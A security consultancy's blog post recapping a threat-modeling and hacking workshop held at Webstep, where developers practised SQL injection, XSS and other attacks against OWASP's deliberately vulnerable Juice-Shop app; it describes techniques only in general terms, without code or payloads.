Cybehave was invited to lead a web application security workshop at Webstep in Trondheim. This was an interesting evening after work hours with burritos, drinks, threat modeling and hacking of the excellent target practice app Juice-Shop from OWASP and @bkimminich. This is a typical(?) ecommerce app that is built to contain many hacking challenges and intentional vulnerabilities. If you want to try for yourself, head over to https://github.com/bkimminich/juice-shop and get started – or if you’d like a Cybehave-run workshop based on this app – send us a request!
Webstep helps clients create and improve digital services and products, bridging the gap between technology and business.
Threat modeling and secure development workflows
Where do vulnerabilities come from? Basically there are 2 sources: design flaws – and bugs. Design flaws are often problems or misunderstandings on the architectural level, whereas bugs are typically implementation errors. Linting, static analysis, pair programming and code reviews are all great techniques for dealing with bugs – but that doesn’t help much if the plan for what to implement is flawed in the first place. This is where threat modeling comes in as a great and necessary tool.
At the workshop we looked at threat modeling going through some key aspects:
- Limiting the scope
- Always explore multiple attack paths
- Quick recap of OWASP Top-10
- Key attack patterns (recon, social engineering + client side exploit combo, persistent access methods)
- Using a data flow diagram and trust boundaries to find potential injection points
- Prioritizing threats
- Creating good security requirements (clear purpose, testable, cost/benefit)
We also talked a bit about how this fits in the bigger picture with threat modeling –> backlog –> unit testing –> debugging –> automated security testing in build pipeline. This was an interesting discussion because Webstep is a consulting company with a wide range of customers, hence they have experience with many levels of DevOps implementation and maturity.
We have done a few hacking workshops before and we always see that some people can do the challenges really quickly and some need a bit more time. We have tried to learn from this and therefore we only did an introduction as a “live demo” – and the rest of the workshop the devs temporarily turned blackhats were hacking away in their own tempo. Some of the things we covered included:
- SQL injection – both basic and more advanced. We did a blind SQL injection to dump all usernames and password hashes, and went ahead to crack hashes using rainbow tables. This is a typical “data breach” attack!
- Various forms of cross-site scripting
- Various parameter injections
- Exploiting lots of very weak security features
Feedback from the team was that this was fun and a great way to learn! If you want to run a workshop like this too with your team, let us know and we can arrange something on short notice.